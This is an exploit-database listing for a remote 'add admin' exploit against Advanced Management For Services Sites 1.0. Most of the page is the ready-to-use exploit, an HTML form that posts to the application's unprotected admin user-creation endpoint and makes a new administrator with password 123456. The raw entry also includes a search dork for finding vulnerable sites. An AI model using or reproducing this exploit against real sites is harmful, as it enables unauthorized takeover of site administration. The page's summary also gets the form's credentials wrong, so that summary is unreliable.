header-logo
Suggest Exploit
vendor:
Advanced Management For Services Sites
by:
alnjm33
7,5
CVSS
HIGH
Remote add admin exploit
264
CWE
Product Name: Advanced Management For Services Sites
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: N/A
CPE: am4ss
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Advneced Management For Services Sites Remote add admin exploit

This exploit allows an attacker to add an admin user to the Advanced Management For Services Sites (AM4SS) software. The attacker can use the Dork 'trace find it' to locate vulnerable sites and then use the provided HTML code to add an admin user with the username 'admin', email 'admin@demo.net', password '123456' and group '1'.

Mitigation:

Ensure that the software is up to date and that all users have strong passwords.
Source

Exploit-DB raw data:

 ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Exploit Title : Advneced Management For Services Sites Remote add admin exploit
Author: alnjm33
Software Link: http://am4ss.com/am4ss.zip
Tested on: Version 1.0
My home : Sec-war.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
==========================================Dork==========================================
                                          find it
================================Exploit=============================================
<html dir="rtl">
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>sec-war.com</title>
</head>
<body text="#00FF00" bgcolor="#000000">
<form method="post" action="http://localhost/am4ss//admincp//users.php?do=add">
    <p align="center"><b><br>
    login with </b></p>
    <p align="center"><a href="mailto:sec-war@demo.net"><font color="#C0C0C0">
    sec-war@demo.net</font></a></p>
    <p align="center"><b>pass</b></p>
    <p align="center">123456</p>
    <table class="tborder" id="table32" style="BORDER-COLLAPSE: separate" cellSpacing="0" cellPadding="4" width="90%" align="center" border="0">
        <colgroup span="2">
            <col style="WIDTH: 45%"><col style="WIDTH: 55%">
        </colgroup>
        <thead>
            <tr>
                <td class="tcat" align="middle" colSpan="2" height="27"><b>add new admin </b>
                </td>
            </tr>
        </thead>
        <tr vAlign="top">
            <td class="optiontitle" colSpan="2">
            <p align="center"> </td>
        </tr>
        <tbody id="tbody_bbtitle">
            <tr vAlign="top">
                <td class="alt1" width="45%">
                <div class="smallfont">
                    <p align="center">Name*</div>
                </td>
                <td class="alt1" width="52%">
                <p align="center">
                <input class="bginput" dir="rtl" tabIndex="1" size="40" name="userfullname" value="Security War">
                </td>
            </tr>
            <tr vAlign="top">
                <td class="optiontitle" colSpan="2">
                <div>
                    <p align="center"> </div>
                </td>
            </tr>
        <tbody id="tbody_bbtitle">
            <tr vAlign="top">
                <td class="alt1" width="45%">
                <p align="center">PASS must me*</td>
                <td class="alt1" width="52%">
                <p align="center">
                <input class="bginput" dir="rtl" tabIndex="1" type="password" size="40" name="password" value="123456"><span lang="fr"> 
                </span></td>
            </tr>
            <tr vAlign="top">
                <td class="optiontitle" colSpan="2">
                <div>
                    <p align="center"> </div>
                </td>
            </tr>
        <tbody id="tbody_bbtitle">
            <tr vAlign="top">
                <td class="alt1" width="45%">
                <div class="smallfont">
                    <p align="center">username email *</div>
                </td>
                <td class="alt1" width="52%">
                <p align="center">
                <input class="bginput" dir="rtl" tabIndex="1" size="40" name="useremail" value="sec-war@demo.net"><span lang="fr"> 
                </span></td>
            </tr>
            <tr vAlign="top">
                <td class="optiontitle" colSpan="2">
                 </td>
            </tr>
        <tbody id="tbody_bbtitle">
            <tr vAlign="top">
                <td class="alt1" width="45%">
                <div class="smallfont">
                    <p align="center"><font face="Tahoma">forget it i made it
                    egypt</font></div>
                </td>
                <td class="alt1" width="52%">
                <p align="center">
                <select class="Edits" style="width: 181; height: 53" name="country" size="99" tabindex="10">
                <option value="ET"></option>
                <option>--   --</option>
                <option value="MA"> </option>
                <option value="EG" selected></option>
                </select> <span lang="fr">  </span></td>
            </tr>
            <tr vAlign="top">
                <td class="optiontitle" colSpan="2">
                <div>
                    <p align="center"> </div>
                </td>
            </tr>
        <tbody id="tbody_bbtitle">
            <tbody id="tbody_bbtitle">
            <tr vAlign="top">
                <td class="alt1" width="45%">
                <div class="smallfont">
                    <p align="center"><font face="Tahoma">forget it i made it
                    admin </font></div>
                </td>
                <td class="alt1" width="52%">
                <p align="center">
                <select name="usergroup" size="1" tabindex="1">
                <option value="3"></option>
                <option value="2"></option>
                <option value="1"></option>
                </select> <span lang="fr">  </span></td>
            </tr>
            <tbody id="tbody_bbtitle">
            <tr>
                <td class="tfoot" align="middle" colSpan="2">
                <input class="button" id="submit" type="submit" value="ok add  "> 
                </td>
            </tr>
    </table>
    <input type="hidden" name="do" value="save">
</form>
</body>
</html>